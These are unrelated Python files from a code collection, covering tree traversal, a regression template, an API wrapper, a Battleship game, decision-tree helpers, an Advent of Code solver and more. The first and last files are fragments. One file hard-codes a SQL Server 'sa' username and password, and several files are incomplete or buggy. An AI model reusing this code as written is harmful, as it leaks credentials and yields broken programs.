strings2 = "686974207468652062756c6c277320657965"
print hex2num(strings1,strings2)
def strxor(a, b):
    """XOR two strings character-wise, truncated to the shorter length."""
    # zip() already stops at the shorter sequence, so the explicit length
    # comparison of the original formulation is redundant.
    return "".join([chr(ord(x) ^ ord(y)) for (x, y) in zip(a, b)])
def hex2bin(a):
    """Expand a hex string into its binary representation, 4 bits per digit."""
    return "".join([format(int(digit, 16), '04b') for digit in a])
def hex2xor2bin(a):
    """Binary form of each hex digit XORed with 0xF (nibble complement)."""
    return "".join([format(15 ^ int(digit, 16), '04b') for digit in a])
# Demo: print the binary expansion of a hex string and of its nibble-complement.
print hex2bin("ab24bd2a1b7ac3")
print hex2xor2bin("ab24bd2a1b7ac3")
f0e3ec0a058b32996d2e686b5d32885d24bf92cb | Python | Shiv2157k/leet_code | /revisited/trees/level_order_traversal.py | UTF-8 | 1,686 | 3.671875 | 4 | [] | no_license | from typing import List
from collections import deque
class TreeNode:
    """Binary-tree node holding an int value and optional children."""

    def __init__(self, val: int, left: "TreeNode" = None, right: "TreeNode" = None):
        # bug fix: left/right were annotated as int; they are child nodes
        # (or None for a missing child).
        self.val = val
        self.left = left
        self.right = right
class BinaryTree:

    def get_level_order_traversal(self, root: "TreeNode") -> List[List[int]]:
        """
        Approach: Depth First Search
        Time Complexity: O(N)
        Space Complexity: O(H)
        :param root: tree root (or None)
        :return: list of per-level value lists, top to bottom
        """
        levels = []
        if not root:
            return levels

        def dfs(node: "TreeNode", level: int):
            # First visit at this depth: open a new bucket for the level.
            if len(levels) == level:
                levels.append([])
            levels[level].append(node.val)
            if node.left:
                dfs(node.left, level + 1)
            if node.right:
                dfs(node.right, level + 1)

        dfs(root, 0)
        return levels

    def get_level_order_traversal_(self, root: "TreeNode") -> List[List[int]]:
        """
        Approach: Breadth First Search
        Time Complexity: O(N)
        Space Complexity: O(N)
        :param root: tree root (or None)
        :return: list of per-level value lists, top to bottom

        bug fix: the original appended the whole ``level_nodes`` list into
        ``levels[level]`` once per node, producing nested lists of repeated
        references instead of one flat list of node values per level.
        """
        levels = []
        if not root:
            return levels
        queue = deque([root])
        while queue:
            current_level = []
            # Drain exactly the nodes that were enqueued for this level.
            for _ in range(len(queue)):
                node = queue.popleft()
                current_level.append(node.val)
                if node.left:
                    queue.append(node.left)
                if node.right:
                    queue.append(node.right)
            levels.append(current_level)
        return levels
| true |
91ec96f2f81f3462e4457518dd3f0b1405b22c6a | Python | Coutinho306/ML | /Templates/Regression Template.py | UTF-8 | 1,427 | 3.515625 | 4 | [] | no_license |
# coding: utf-8
# # Regression Templates
# ### Importing Libraries
# In[ ]:
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import os


# ### Setting Datasets directory and Importing dataset

# In[ ]:

# NOTE(review): hard-coded absolute Windows path -- adjust for your machine.
os.chdir("C:\\Users\\Thiago\\Desktop\\Python-ML\\Datasets")
dataset = pd.read_csv("Position_Salaries.csv")


# ### Creating features and target variables

# In[ ]:

X = dataset.iloc[:, 1:2].values
y = dataset.iloc[:, 2].values


# ### Splitting in Training and Test set

# In[ ]:

from sklearn.model_selection import train_test_split
X_treino, X_teste, y_treino, y_teste = train_test_split(X, y, test_size=0.2, random_state=0)


# ### Fitting the Regression model
# (template placeholder: instantiate and fit `regressor` here)


# ### Predicting Results

# In[ ]:

# bug fix: predict() requires the samples to predict on.
y_pred = regressor.predict(X)


# ### Visualiazing Regression Results

# In[ ]:

plt.figure(figsize=(10, 7))
plt.scatter(X, y, color="red")
plt.plot(X, regressor.predict(X), color="blue")
plt.title("Truth or Bluff (Regression Model)")
plt.xlabel("Position Level")
plt.ylabel("Salary")
plt.show()


# ### Visualiazing Regression Results in Higher Resolution

# In[ ]:

# bug fixes: np.arrange does not exist (np.arange, with numeric bounds and
# step, is intended) and the reshape must be applied to X_grid -- the
# original called np.reshape(len(X_grid), 1) without the array.
X_grid = np.arange(min(X), max(X), 0.1)
X_grid = X_grid.reshape(len(X_grid), 1)
plt.figure(figsize=(10, 7))
plt.scatter(X, y, color="red")
plt.plot(X_grid, regressor.predict(X_grid), color="blue")
plt.title("Truth or Bluff (Regression Model)")
plt.xlabel("Position Level")
plt.ylabel("Salary")
plt.show()
| true |
ec53003190925e827e9a67f0c23cf2178b6899f1 | Python | j415/DjangoBasics | /0730-线程、进程、协程/3、线程/11.线程通信.py | UTF-8 | 422 | 3.15625 | 3 | [] | no_license | import threading, time
def func():
    """Start a worker thread that prints once per event signal.

    Returns the threading.Event the caller must set() to release each of
    the worker's five iterations.
    """
    # Event used to hand-shake between the caller and the worker thread.
    event = threading.Event()
    def run():
        for i in range(5):
            # Block until the caller signals the event.
            event.wait()
            # Reset immediately so the next iteration blocks again.
            event.clear()
            print("aspiring-----%d" %i)
    # bug fix: Thread.start() returns None, so the original `t = ...`
    # binding was meaningless; just start the worker.
    threading.Thread(target=run).start()
    return event
e = func()
# Fire the event once every two seconds; each set() releases one
# iteration of the worker loop started inside func().
for i in range(5):
    time.sleep(2)
    e.set()
| true |
01fd0eb7d49ad7c1837e7b16864ef90919cd9926 | Python | nxlr/PatentsView-APIWrapper | /api_wrapper.py | UTF-8 | 3,844 | 2.734375 | 3 | [] | no_license | from __future__ import print_function
import configparser
import json
import os
import requests
import json_to_csv
import sys
import pandas as pd
def query(configfile):
    """Query the PatentsView API using parameters specified in *configfile*.

    Each config section describes one query: the API entity, an input file
    of lookup values, the output directory, the fields to fetch, optional
    sort keys and filter criteria.  Raw JSON responses are written per
    result, then merged, cleaned and saved as '<section>.csv'.
    """
    parser = configparser.ConfigParser()
    parser.read(configfile)
    # Loop through the separate queries listed in the config file.
    for q in parser.sections():
        print("Running query: ", q)
        # Parse parameters from config file (values are JSON-encoded).
        entity = json.loads(parser.get(q, 'entity'))
        url = 'http://www.patentsview.org/api/'+entity+'/query?'
        input_file = json.loads(parser.get(q, 'input_file'))
        directory = json.loads(parser.get(q, 'directory'))
        input_type = json.loads(parser.get(q, 'input_type'))
        fields = json.loads(parser.get(q, 'fields'))
        try:
            # If specified, 'sort' should be a list of dictionaries, specifying
            # the order of keys and direction of each key.
            sort = json.loads(parser.get(q, 'sort'))
            sort_fields, sort_directions = [], []
            for dct in sort:
                for field in dct:
                    # We can only sort by fields that are in the data
                    if field in fields:
                        sort_fields.append(field)
                        sort_directions.append(dct[field])
            if len(sort_fields) == 0:
                sort_fields = [fields[0]]
                sort_directions = ["asc"]
        # NOTE(review): bare except silently falls back to the default sort
        # for *any* error (missing option, malformed JSON, ...).
        except:
            sort_fields = [fields[0]]
            sort_directions = ["asc"]
        # AND together every option whose name starts with 'criteria'.
        criteria = {"_and": [json.loads(parser.get(q, option)) for option in
                    parser.options(q) if option.startswith('criteria')]}
        # NOTE(review): the input file handle is never closed explicitly.
        item_list = list(set(open(os.path.join(directory, input_file)).read().split('\n')))
        results_found = 0
        item_list_len = len(item_list)
        # One API request per lookup value.
        for item in item_list:
            params = {
                'q': {"_and": [{input_type: item}, criteria]},
                'f': fields
            }
            r = requests.post(url, data=json.dumps(params))
            if 400 <= r.status_code <= 499:
                print("Client error when quering for value {}".format(item))
            elif r.status_code >= 500:
                print("Server error when quering for value {}. You may be exceeding the maximum API request size (1GB).".format(item))
            elif json.loads(r.text)['count'] != 0:
                # Persist each non-empty raw JSON response with a running index.
                outp = open(os.path.join(directory, q + '_' + \
                    str(results_found) + '.json'), 'w')
                print(r.text, end = '', file=outp)
                outp.close()
                results_found += 1
        if results_found == 0:
            print("Query {} returned no results".format(q))
        else:
            # Output merged CSV of formatted results.
            json_to_csv.main(directory, q, results_found)
            # Clean csv: reorder columns, drop duplicates, sort, then save
            output_filename = os.path.join(directory, q+'.csv')
            df = pd.read_csv(output_filename, dtype=object, encoding='Latin-1')
            df = df[fields].drop_duplicates().sort_values(by=sort_fields,
                ascending=[direction != 'desc' for direction in sort_directions])
            df.to_csv(output_filename, index=False)
            print('({} rows returned)'.format(len(df)))
if __name__ == '__main__':
    # Basic CLI validation before running the configured queries.
    if sys.version_info[0] != 3:
        print("Please use Python version 3; you are using version:", sys.version)
        sys.exit(1)
    if len(sys.argv) < 2:
        print("USAGE: python api_wrapper.py config_file")
        sys.exit(1)
    if not os.path.isfile(sys.argv[1]):
        print("File not found: ", sys.argv[1])
        # bug fix: previously fell through and called query() on the
        # missing file anyway.
        sys.exit(1)
    query(sys.argv[1])
0c8dbe74adc8ca98c7a8a97c57dba338118c9c61 | Python | ehsansh84/services | /bigtc/handlers/crawler.py | UTF-8 | 828 | 2.515625 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import tornado.web
import redis
class CrawlerHandler(tornado.web.RequestHandler):
    """Tornado handler exposing crawler start/status over Redis.

    Liveness is tracked with the Redis key 'crawler_stat', which expires
    20 seconds after the last 'start' action unless refreshed.
    """

    def get(self, *args, **kwargs):
        # New Redis connection per request (localhost, default port).
        r_server = redis.Redis('localhost')
        crawler_data = {
            'status': '',
            'expire': -1
        }
        action = self.get_argument('action', '')
        if action == 'start':
            # Mark the crawler as running for the next 20 seconds.
            r_server.set('crawler_stat', 'Running')
            r_server.expire('crawler_stat', 20)
            crawler_data['status'] = 'Running'
            crawler_data['expire'] = 20
        elif action == 'update':
            # Report the stored status and its remaining TTL.
            crawler_data['status'] = r_server.get('crawler_stat')
            crawler_data['expire'] = r_server.ttl('crawler_stat')
        # self.write('Started')
        self.render('crawler.html', crawler_data=crawler_data)
| true |
31a61e754098e40f39ee279f894a57953572b94d | Python | ahmadturkmani/CPSC231 | /Battleship/Ahmed/Battleship41.py | UTF-8 | 3,830 | 4.1875 | 4 | [
"MIT"
] | permissive | #********************************************
# By Ahmed Elbannan
# September 22nd 2013
# Battleship CPSC231 (Limited Edition! ;] )
#********************************************
# global variables
# Shared mutable state: current ship orientation and the board cursor.
# x starts as a letter code (ord('A')) and is converted to a 0-based
# column index by validate_location; y is the 0-based row index.
direction = 'horizontal';
x = ord('A');
y = 0;
# Title Screen! Now a function!
def print_titlescreen():
    """Draw the ASCII-art title banner, framed by blank lines."""
    banner = [
        '________________________________________',
        '|*********WELCOME TO BATTLESHIP!*******|',
        '|**************************************|',
        '|**************************************|',
        '|*********A game like no other!********|',
        '|**************************************|',
        '|**************************************|',
        '|**************************************|',
    ]
    print()
    for banner_line in banner:
        print(banner_line)
    print()
    return
# end
def print_vessel(name):
    """Announce the board coordinate and orientation of vessel *name*.

    Reads the module-level cursor (x, y) and orientation; x/y are 0-based
    and rendered as a letter column and 1-based row.
    """
    column_letter = chr(x + ord('A'))
    row_number = str(y + 1)
    print('Your ' + name + ' is located at (' + column_letter + ', ' + row_number + ')')
    print('It is positioned ' + direction + 'y.')
    print()
    return
# end
def get_location(name, spaces):
    """Prompt the player for the bow coordinate of vessel *name*.

    Stores the raw (unvalidated) input strings in the module globals
    x and y; validation happens later in validate_location.
    """
    global x
    global y
    print('Where would you like to place your ' + name + ' (' + str(spaces) + ' spaces)')
    x = input('Enter horizontal position (A-J):')
    y = input('Enter vertical position (1-10) :')
    print()
    return
# end
# Calculate next ship position based on previous ship dimensions
def modify_row(name, size):
    """Advance the shared row cursor by *size*, wrapping at 10, then announce *name*."""
    global y
    y = (y + size) % 10
    print_vessel(name)
    return
# end
# Calculate next ship position based on previous ship dimensions
def modify_column(name, size):
    """Advance the shared column cursor by *size*, wrapping at 10, then announce *name*."""
    global x
    x = (x + size) % 10
    print_vessel(name)
    return
# end
def validate_location(name, size, direction):
    """Validate the player-entered position for vessel *name* of *size* cells.

    Converts the raw input strings in globals x/y into 0-based indices,
    checks the vessel fits on the 10x10 board in *direction*, and re-prompts
    (recursively) on bad input.

    bug fixes vs. the original:
    - the vertical branch called print_vessel with extra arguments;
    - every re-prompt/announcement hard-coded 'Aircraft Carrier' and size 5
      instead of using this vessel's *name* and *size*.
    """
    global x
    global y
    # Require a single letter and at most a two-digit number before converting.
    if (len(x) == 1) and (len(y) < 3):
        x = (ord(x) - ord('A'))
        y = (int(y) - 1)
        # Check the position is on the board and the whole ship fits.
        if (direction == 'horizontal') and (-1 < x < (10 - size)) and (-1 < y < 10):
            print_vessel(name)
            print('The end of your ' + name + ' is located at (' + chr(((x + size - 1) % 10) + ord('A')) + ', ' + str(y + 1) + ')')
            print()
        elif direction == 'vertical' and (-1 < y < (10 - size)) and (-1 < x < 10):
            print_vessel(name)
            print('The end of your ' + name + ' is located at (' + chr(x + ord('A')) + ', ' + str(((y + size - 1) % 10) + 1) + ')')
            print()
        else:
            print('The location you entered is not on the board!')
            get_location(name, size)
            validate_location(name, size, direction)
    else:
        print('Please enter a LETTER (between A-J) and a NUMBER (between 1-10!)')
        get_location(name, size)
        validate_location(name, size, direction)
    return
def enter_choice():
    """Keep prompting until the player enters 'q'."""
    choice = ''
    while choice != 'q':
        choice = input('Enter choice: ')
    return
def main():
    """Drive the demo: place the carrier from user input, derive the other
    ship positions from it, then wait for 'q' to quit."""
    global direction; # this function can edit direction
    # prints name, location, and orientation of a vessel
    print_titlescreen();
    # Ask user to place aircraft carrier
    get_location('Aircraft Carrier', 5);
    direction = 'horizontal';
    validate_location('Aircraft Carrier', 5, direction);
    # based on input, calculate the position of the battleship
    direction = 'vertical';
    modify_column('Battleship', 5);
    # now calculate position of sub
    direction = 'horizontal';
    modify_row('Submarine', 4);
    # the same with the destroyer
    direction = 'vertical';
    modify_column('Destroyer', 3);
    #loop until q is entered
    enter_choice();
    return;
# end
# Script entry point: run the ship-placement demo.
main();
| true |
cb82c9d4823fa3cf522e68655129cb51a44214e1 | Python | xikunqu/Python_100_days | /D1-15/Day7/eg3.py | UTF-8 | 623 | 3.8125 | 4 | [] | no_license | def main():
fruits=['grape','apple','strawberry','waxberry']
fruits+=['pitaya','pear','mango']
#循环遍历列表元素
for fruit in fruits:
print(fruit.title(),end=' ')
print()
#列表切片
fruits2=fruits[1:4]
print(fruits2)
#fruits3=fruits #没有复制列表只创建了新的引用
#可以通过完整切片操作来复制列表
fruits3=fruits[:]
print(fruits3)
fruits4=fruits[-3:-1]
print(fruits4)
#可以通过反向切片操作来获得倒转后的列表的拷贝
fruits5=fruits[::-1]
print(fruits5)
if __name__=='__main__':
    # Run the slicing demo when executed as a script.
    main()
fa96017b58807484e1f84b74b3e3460ad5557992 | Python | alysivji/talks | /code-smell--if-statements/examples/polymorphic_animals.py | UTF-8 | 255 | 3.671875 | 4 | [] | no_license | class Animal:
def __init__(self, name):
self.name = name
def speak(self):
raise NotImplementedError
class Cat(Animal):
def speak(self):
return "Meow!"
class Dog(Animal):
def speak(self):
return "Woof!"
| true |
ce0927c70ee24243b0a5a1d8f8ccd415ba0018c8 | Python | ES654/assignment-2-yadavsunny05 | /tree/utils.py | UTF-8 | 2,645 | 2.953125 | 3 | [] | no_license |
import math
import numpy as np
import pandas as pd
def entropy(Y):
    """Weighted Shannon entropy of the rows of Y.

    Y is a 2-D numpy array whose last column holds a per-row weight.
    NOTE(review): rows are grouped by str() of the *entire* row
    (features + weight), not by a label column -- confirm this is intended.

    Returns the entropy in bits (base-2 logarithm).
    """
    entro = 0.0
    sample_count = dict()
    for i in range(len(Y)):
        key = str(Y[i])
        # Accumulate the weight of every identical row.
        sample_count[key] = sample_count.get(key, 0.0) + Y[i][-1]
    # Total weight is loop-invariant; compute it once (the original
    # recomputed np.sum on every iteration).  The dead `pass` after the
    # return statement was removed.
    total = np.sum(Y[:, -1])
    for weight in sample_count.values():
        prob = weight / total
        entro -= prob * math.log(prob, 2)
    return entro
def info_gain_real_discrete(left, right, current):
    """Weighted information gain of splitting `current` into `left`/`right`.

    Each argument is a 2-D array whose last column is a sample weight.
    """
    w_left = sum(left[:, -1])
    w_right = sum(right[:, -1])
    total = w_left + w_right
    gain = entropy(current)
    gain -= entropy(left) * w_left / total
    gain -= entropy(right) * w_right / total
    return gain
def split(rows, threshold, col):
    """Partition rows on column `col` against `threshold`.

    Rows with row[col] >= threshold go right, the rest go left.  Returns
    (None, None) when either side would be empty so callers can skip
    degenerate splits.
    """
    left, right = [], []
    for row in rows:
        (right if row[col] >= threshold else left).append(row)
    if not left or not right:
        return None, None
    return left, right
def best_split(rows):
    """Exhaustively search every column/threshold pair for the best split.

    Assumes the last two columns of each row are non-feature columns
    (label and weight, presumably -- confirm against callers).
    Returns (gain, threshold, column index, left rows, right rows).
    """
    best_gain=-99999
    threshold= -99999
    index = 0
    best_left = None
    best_right = None
    # NOTE(review): `current` is computed but never used afterwards;
    # info_gain_real_discrete() is passed `rows` directly below.
    current=entropy(rows[:])
    # Only feature columns are candidates (last two columns excluded).
    for col in range(len(rows[0])-2):
        # Every distinct value in the column is tried as a threshold.
        thresholds=set([row[col] for row in rows])
        for i in thresholds:
            left,right=split(rows,i,col)
            if((left!=None)and(right!=None)):
                # Round-trip through a DataFrame to get 2-D numpy arrays.
                left = pd.DataFrame(left)
                right = pd.DataFrame(right)
                left = np.array(left)
                right = np.array(right)
                temp=info_gain_real_discrete(left,right,rows)
                # >= keeps the most recently seen split on ties.
                if temp>=best_gain:
                    best_left = np.array(left)
                    best_right = np.array(right)
                    best_gain = temp
                    threshold=i
                    index = col
    return best_gain,threshold,index,best_left,best_right
def best_split_Real_Real(Y, attr):
    """Best split threshold for a real attribute and a real target.

    Pairs each target value with its attribute value, orders the pairs by
    target, then scores every split position by the summed variance of the
    attribute values on either side.  Returns (best score, midpoint
    threshold between the two pairs straddling the best split).
    """
    pairs = [[Y[i], attr[i]] for i in range(len(attr))]
    ordered = np.array(sorted(pairs, key=lambda pair: pair[0]))
    best_score = 999999
    best_threshold = 0
    for pos in range(1, len(Y)):
        score = np.var(ordered[:pos, 1]) + np.var(ordered[pos:, 1])
        if score < best_score:
            best_score = score
            best_threshold = (ordered[pos, 1] + ordered[pos - 1, 1]) / 2
    return (best_score, best_threshold)
def information_gain(Y, attr, weight):
    """Entropy reduction from partitioning Y by the values of attr.

    Y is a pandas Series of labels; attr maps the same index to attribute
    values.  NOTE(review): the `weight` argument is accepted but unused.
    """
    gain = entropy(Y)
    partitions = dict()
    for idx in list(Y.index):
        partitions.setdefault(attr[idx], []).append(Y[idx])
    total = len(list(Y.index))
    for value in partitions:
        gain -= entropy(partitions[value]) * (len(partitions[value]) / total)
    return gain
| true |
fd115b36382655300abaa5914b0ebe1d1c2635cc | Python | fenght96/Detection_maybe | /im_read_and_show.py | UTF-8 | 593 | 2.625 | 3 | [] | no_license | import matplotlib.pyplot as plt
import matplotlib.image as mpimg
# One figure with no gaps between subplots (tight 4x6 grid).
fig = plt.figure()
plt.subplots_adjust(wspace =0, hspace =0)
# NOTE(review): img_list is empty, so the loops below draw nothing --
# presumably it should hold image basenames (without extension).
img_list = []
# 1-based subplot slot; thermal ('trm') images go one 6-column row below.
i = 1
for path in ['./', './']:
    for img in img_list:
        for xx in ['rgb', 'trm']:
            # Load <path>/<modality>/<name>.jpg for each rgb/thermal pair.
            img1 = mpimg.imread(path + xx +'/' + img + '.jpg')
            if xx == 'trm':
                ax = fig.add_subplot(4, 6, i + 6)
            else:
                ax = fig.add_subplot(4, 6, i)
            ax.imshow(img1)
            plt.axis('off')
            i += 1
    # Skip the row consumed by the thermal images.
    i += 6
plt.savefig('./imshow.jpg')
plt.show()
| true |
31f82d9f2a5b5b53f46541165351b430b187dae4 | Python | mrFred489/AoC2018 | /17.py | UTF-8 | 4,499 | 2.65625 | 3 | [] | no_license | from collections import *
import itertools
import random
import sys
import re
# Advent of Code 2018 day 17: parse one "x=..., y=a..b" vein spec per line.
f = open("17.txt").read().split("\n")
# f = open("17.example").read().split("\n")
m = []
# bounds[y] = set of x coordinates that are solid ('#') on that row.
bounds = defaultdict(set)
for line in f:
    if line == "":
        continue
    line = line.split(", ")
    c1, c1d = line[0].split("=")
    c1d = int(c1d)
    c2, c2d = line[1].split("=")
    c2d = c2d.split("..")
    # print(c2d)
    # print(int(c2d[0]), int(c2d[1]))
    # Expand the "a..b" range into the set of covered coordinates.
    c2d = set(range(int(c2d[0]), int(c2d[1])+1))
    if c1 == "y":
        bounds[c1d] = bounds[c1d].union(c2d)
    elif c1 == "x":
        for y in c2d:
            bounds[y].add(c1d)
# water_coords: every tile water has reached (flowing or settled);
# still_water: tiles where water has come to rest;
# work: frontier of tiles to expand in the next simulation round.
water_coords = set()
still_water = set()
work = set()
# for v, i in bounds.items():
#     print(v, i)
maxy = max(bounds.keys())
miny = min(bounds.keys())
# The spring pours in at x=500, starting from the topmost solid row.
water_coords.add((500, miny))
work.add((500, miny))
print(miny, maxy)
iterations = 0
# Expand the water one frontier round at a time until both the reached
# and the settled sets stop changing.
while True:
    if len(work) == 0:
        break
    old_work = work
    work = set()
    old_water_coords = water_coords.copy()
    old_still_water = still_water.copy()
    for x, y in old_water_coords:
        # Settled tiles never expand; tiles below the map are ignored.
        if (x, y) in still_water or y > maxy:
            continue
        # Fall straight down while the tile below is open.
        if x not in bounds[y+1] and (x, y+1) not in still_water and y <= maxy:
            water_coords.add((x, y+1))
            work.add((x, y+1))
        # Blocked below (solid or settled water): spread sideways.
        elif x in bounds[y+1] or (x, y+1) in still_water:
            # print(x, y, bounds[y])
            # print(bounds[y+1])
            # print(x-1 not in bounds[y] and (x-1, y) not in water_coords)
            if x-1 not in bounds[y]:
                # print(x-1)
                water_coords.add((x-1, y))
                work.add((x-1, y))
            else:
                # Left side walled: scan right over supported water; if a
                # right wall is found too, the whole run settles.
                dx, dy = x, y
                while (dx, dy) in water_coords:
                    if dx in bounds[dy+1] or (dx, dy+1) in still_water:
                        if dx+1 in bounds[dy]:
                            for i in range(x, dx+1):
                                still_water.add((i, y))
                            break
                        dx += 1
                    else:
                        break
            if x+1 not in bounds[y]:
                water_coords.add((x+1, y))
                work.add((x+1, y))
            else:
                # Mirror image: right side walled, scan left for a wall.
                dx, dy = x, y
                while (dx, dy) in water_coords:
                    if dx in bounds[dy+1] or (dx, dy+1) in still_water:
                        if dx-1 in bounds[dy]:
                            for i in range(dx, x+1):
                                still_water.add((i, y))
                            break
                        dx -= 1
                    else:
                        break
    # if iterations % 1000 == 0:
    #     maxx = max([x for x, y in water_coords])
    #     minx = min([x for x, y in water_coords])
    #     for vals in bounds.values():
    #         if len(vals) == 0:
    #             continue
    #         mx = min(vals)
    #         mm = max(vals)
    #         if mx < minx:
    #             minx = mx
    #         if mm > maxx:
    #             maxx = mm
    #     res = ""
    #     for y in range(miny, maxy+1):
    #         for x in range(minx-1, maxx+1):
    #             if (x, y) in still_water:
    #                 res += "~"
    #             elif (x, y) in water_coords:
    #                 res += "|"
    #             elif x in bounds[y]:
    #                 res += "#"
    #             else:
    #                 res += "."
    #         res += "\n"
    #     print(res)
    # Fixed point reached: nothing changed this round, so stop.
    if water_coords == old_water_coords and still_water == old_still_water:
        break
    iterations += 1
# Determine the horizontal extent of the rendered map (water plus walls).
maxx = max([x for x, y in water_coords])
minx = min([x for x, y in water_coords])
for vals in bounds.values():
    if len(vals) == 0:
        continue
    mx = min(vals)
    mm = max(vals)
    if mx < minx:
        minx = mx
    if mm > maxx:
        maxx = mm
# Build an ASCII picture: '~' settled water, '|' flowing water, '#' solid.
res = ""
for y in range(miny, maxy+1):
    for x in range(minx-1, maxx+1):
        if (x, y) in still_water:
            res += "~"
        elif (x, y) in water_coords:
            res += "|"
        elif x in bounds[y]:
            res += "#"
        else:
            res += "."
    res += "\n"
# print(res)
# print(miny, maxy)
# print("still", sorted([(y, x) for x, y in still_water]))
# print("water", sorted([(y, x) for x, y in water_coords]))
# Part 1 counts every water-reached tile within the mapped rows;
# part 2 counts only the settled water.
print("part1", len([(x, y) for x, y in water_coords if miny <= y <= maxy]))
print("part2", len([(x, y) for x, y in still_water if miny <= y <= maxy]))
| true |
ec12f074c7630c11f6218f94a57cc8ecfadcfe19 | Python | anantkaushik/algoexpert | /Balanced-Brackets.py | UTF-8 | 898 | 4.25 | 4 | [] | no_license | """
Problem Link: https://www.algoexpert.io/questions/Balanced%20Brackets
Write a function that takes in a string made up of brackets ("(", "[", "{", ")", "]", and "}") and other optional characters.
The function should return a boolean representing whether or not the string is balanced in regards to brackets.
A string is said to be balanced if it has as many opening brackets of a given type as it has closing brackets of that type and
if no bracket is unmatched. Note that a closing bracket cannot match a corresponding opening bracket that comes after it.
Similarly, brackets cannot overlap each other as in "[(])".
"""
def balancedBrackets(string):
    """Return True when every bracket in `string` is properly matched.

    Brackets are "()[]{}"; all other characters are ignored, as the
    problem statement above allows "other optional characters".  The
    original implementation routed every non-opening character into the
    closing-bracket branch, so strings like "a(b)c" were wrongly rejected.

    O(n) time, O(n) space.
    """
    pairs = {")": "(", "]": "[", "}": "{"}
    stack = []
    for char in string:
        if char in "([{":
            stack.append(char)
        elif char in pairs:
            # A closer must match the most recent unmatched opener.
            if not stack or stack.pop() != pairs[char]:
                return False
    # Balanced only if no opener is left unmatched.
    return len(stack) == 0
| true |
b877d0459a9107e8dacde3f80f235b8d354ddcbf | Python | bauer90/scaling-hipster | /apr17/7_4.py | UTF-8 | 1,229 | 3.78125 | 4 | [] | no_license | # implements 'substitution' operation using only 'addition'
def sub_using_add(a, b):
    """Subtract b from a using only addition: a - b == a + (-b)."""
    negated_b = negate_using_add(b)
    return a + negated_b
# implements 'multiplication' operation using only 'addition'
def mult_using_add(a, b):
    """Multiply two integers by adding |a| to an accumulator |b| times."""
    magnitude_a = my_abs(a)
    magnitude_b = my_abs(b)
    result = 0
    added = 0
    while added < magnitude_b:
        result += magnitude_a
        added += 1
    # The product is positive exactly when the operands share a sign.
    if (a > 0 and b > 0) or (a < 0 and b < 0):
        return result
    return negate_using_add(result)
# implements integer's 'division' operation using only 'addition'
def div_using_add(a, b):
    """Integer division (truncated toward zero) using only addition.

    Counts how many times |b| fits into |a| and fixes up the sign at the
    end.

    Raises:
        ZeroDivisionError: if b == 0 (the original looped forever here,
        since subtracting 0 never drives abs_a negative).
    """
    if b == 0:
        raise ZeroDivisionError("integer division by zero")
    abs_a = my_abs(a)
    abs_b = my_abs(b)
    result = 0
    # Count subtractions until abs_a goes negative, then back off by one.
    while abs_a >= 0:
        abs_a -= abs_b
        result += 1
    result -= 1
    if (a > 0 and b > 0) or (a < 0 and b < 0):
        return result
    else:
        return negate_using_add(result)
# UTILITY FUNCTIONS ---
# absolute value
def my_abs(a):
    """Absolute value; negatives are flipped via negate_using_add."""
    return a if a >= 0 else negate_using_add(a)
# turns a positive number to negative using only 'addition'
# (not sure if it's legit: number -1 used somewhere)
def negate_using_add(a):
    """Negate an integer by repeatedly adding a unit step.

    Adds -1 (for positive a) or +1 (for negative a) to an accumulator,
    once per unit of a's magnitude, until a itself reaches zero.
    """
    neg = 0
    if a == 0:
        return 0
    elif a > 0:
        d = -1
    else:
        d = 1
    # Walk a toward zero; each step pushes neg one unit the other way.
    while a != 0:
        neg += d
        a += d
return neg | true |
1f2db8e70adfe7867430f59ba087b65dd422503a | Python | PaulMaillard/algo | /python/fonctions.py | UTF-8 | 370 | 3.859375 | 4 | [] | no_license | #Les fonctions
# by Paul Personne
# Beweb Lunel
# Weather events used by the demo below (French: rain, nice, snow, hail).
evenement = ["pleut", "beau", "neige", "grele"]
def affichageDuTemps(temps):
    """Print a short French weather sentence for the given condition."""
    # "beau" needs the verb: "Il fait beau"; every other event reads "Il <x>".
    prefix = "fait " if temps == "beau" else ""
    print("Il " + prefix + temps)
# Print a sentence for every recorded weather event.  Iterating the list
# directly replaces the index-based `for i in range(len(...))` loop.
for event in evenement:
    affichageDuTemps(event)
| true |
1f7cd4809a0aefbf059531010088a9c58e4d9fd8 | Python | christhemastercoder/flaskapp2 | /api/user_db2.py | UTF-8 | 921 | 2.6875 | 3 | [] | no_license | import pyodbc as po
from flask import jsonify
# Connection settings for the local SQL Server instance.
# SECURITY(review): credentials are hard-coded in source control -- move
# them to environment variables or a secrets store before deploying.
server = '127.0.0.1,1433'
database = 'People'
username = 'sa'
password = '615Laurafc!@'
# Module-level connection and cursor shared by all handlers below.
cnxn = po.connect('DRIVER={ODBC Driver 17 for SQL Server};SERVER=' + server + ';DATABASE='+database+';UID='+username+';PWD=' + password)
cursor = cnxn.cursor()
def getAllPeople():
    """Run the Get_Everybody stored procedure; return rows as strings.

    Each pyodbc row is stringified, stripped of its surrounding
    parentheses and single quotes, and collected into a JSON array.
    """
    cursor.execute("""EXEC dbo.Get_Everybody""")
    data = []
    for row in cursor:
        cleaned = str(row)[1:-1].replace("'", "")
        data.append(cleaned)
    cnxn.commit()
    return jsonify(data)
def getAllPeople2():
    """Run Get_Everybody; return rows as structured JSON objects.

    NOTE(review): the column order is assumed to be
    (name, id, position, age) -- confirm against the stored procedure.
    """
    cursor.execute("""EXEC dbo.Get_Everybody""")
    data = []
    for row in cursor:
        data.append({
            "name": str(row[0]),
            "age": row[3],
            "position": str(row[2]),
            "id": row[1],
        })
    return jsonify(data)
| true |
d42598e1307a63717ae687dc8ee53e538c0ae8d7 | Python | mezhebovskyy/studying | /structure_models/some_various_examples/tweetcount.py | UTF-8 | 963 | 3.3125 | 3 | [] | no_license | tweetLength = 10
# File where tweets are appended, separated by blank lines.
fileName = "tweetspile.txt"
def main():
    """Show stored tweets, then read new ones until '.' is entered.

    Messages longer than tweetLength characters are split into
    tweetLength-sized chunks before being saved.  (Python 2 script:
    uses raw_input.)
    """
    displayTweets()
    while True:
        sentence = raw_input("Make us happy with your new thoughts using Twitter: ")
        if sentence == ".":
            break
        if len(sentence) <= tweetLength:
            savetofile(sentence)
        else:
            for start in range(0, len(sentence), tweetLength):
                savetofile(sentence[start:start + tweetLength])
def savetofile(lines):
print "Now saving to file %r..." % fileName
f = open(fileName, 'a')
f.write(lines + '\n\n')
f.close()
def displayTweets():
f = open(fileName, "r")
fileContent = f.read()
tweets = fileContent.split("\n\n")
for tweet in tweets:
